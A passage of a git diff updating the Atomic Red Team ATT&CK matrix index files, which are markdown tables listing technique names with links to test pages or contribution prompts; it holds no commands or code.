+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
+| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
+| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
+| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
+| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -116,7 +126,7 @@
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index d8be9c7e..37412bac 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -4,72 +4,76 @@
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1551.001/T1551.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1551.004/T1551.004.md) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Window](../../T1564.003/T1564.003.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1551/T1551.md) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
